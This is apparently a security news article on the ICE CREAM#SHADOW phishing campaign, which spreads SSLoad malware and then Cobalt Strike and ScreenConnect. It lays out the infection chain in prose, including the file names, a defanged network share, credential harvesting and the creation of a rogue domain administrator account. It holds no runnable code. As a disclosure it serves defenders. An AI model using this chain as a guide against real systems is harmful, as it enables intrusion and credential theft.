Cybersecurity researchers have discovered an ongoing attack campaign that leverages phishing emails to spread malware called SSLLoad.
The campaign, code name ICE CREAM#SHADOW from Securonix, also includes the implementation of Cobalt Strike and ConnectWise ScreenConnect remote desktop software.
“SSLoad is designed to stealthily infiltrate systems, collect sensitive information, and transmit the results to its operators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
“Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection.”
The attack chains involve the use of phishing messages to randomly target organizations in Asia, Europe and the Americas, with emails containing links that lead to the retrieval of a JavaScript file that initiates the infection flow.
Earlier this month, Palo Alto Networks discovered at least two different methods by which SSLoad is distributed, one involving the use of website contact forms to embed booby-trapped URLs and another involving booby-trapped Microsoft Word documents for macros.
The latter is also notable for the fact that the malware acts as a conduit to spread Cobalt Strike, while the former was used to spread a different malware called Latrodectus, a likely successor to IcedID.
The obfuscated JavaScript file (“out_czlrh.js”), when started and run using wscript.exe, retrieves an MSI installation file (“slack.msi”) by connecting to a network share located at “\\wireoneinternet[.]info@80\share\” and runs it using msiexec.exe.
The MSI installer, for its part, contacts an attacker-controlled domain to retrieve and execute the SSLoad malware payload using rundll32.exe, after which it connects to a command and control (C2) server along with information about the compromised system .
The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate adversary simulation software, which is then used to download and install ScreenConnect, thus allowing threat actors to remotely commandeer the host.
“With full access to the system, threat actors began attempting to acquire credentials and collect other critical system details,” the researchers said. “At this point they began scanning the victim’s host for credentials stored in files and other potentially sensitive documents.”
Attackers were also observed to move to other systems on the network, including the domain controller, and then infiltrate the victim’s Windows domain by creating their own domain administrator account.
“With this level of access, they could access any connected machine within the domain,” the researchers said. “Ultimately, this is the worst-case scenario for any organization as remediating the level of persistence achieved by the attackers would be incredibly time-consuming and expensive.”
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems were infected with an open-source remote access trojan called Pupy RAT.